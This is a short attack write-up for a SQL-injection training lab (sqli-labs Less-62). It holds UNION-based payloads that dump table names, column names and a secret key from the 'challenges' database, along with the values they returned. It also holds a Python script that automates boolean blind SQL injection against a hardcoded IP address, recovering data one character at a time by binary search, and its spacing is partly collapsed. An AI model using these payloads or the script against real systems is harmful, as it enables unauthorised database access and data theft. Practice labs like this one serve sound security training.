#1.table_name -> A8OVY3542N -1) union select 1,group_concat(table_name),3 from information_schema.tables \ where table_schema='challenges'--+ #2.column_name -> secret_XXQ0 -1) union select 1,group_concat(column_name),3 from information_schema.columns \ where table_name='A8OVY3542N'--+ # secret_key -> tDKqoseQXitElBSv7SsW3XLv -1) union select 1,group_concat(secret_XXQ0),3 from A8OVY3542N--+
# -*- coding: utf-8 -*- import time import requests from urllib.parse import quote_plus
main_url = 'http://43.247.91.228:84/Less-62/?id='
correct = 'Your Login name : Angelina'
# payload table_name_ = '1\') and ascii(substr((select group_concat(table_name) '\ 'from information_schema.tables where table_schema=\'challenges\'),%d,1))%s%d#'
defcheck(query_string): url = main_url + quote_plus(query_string) html = requests.get(url) if correct in html.text: returnTrue else: returnFalse
defsearch(payload): print('[*]' + payload) result = '' print('[~]', end = '') for i in range(1, 100): left = 33 right = 127 #binary search while left <= right: mid = (left + right) // 2 s = payload % (i, '=', mid) if check(s): result += chr(mid) print(chr(mid), end = '') break else: s = payload % (i, '>', mid) if check(s): left = mid + 1 else: right = mid - 1 if left > right: break print() return result
if __name__=="__main__": table_name = search(table_name_)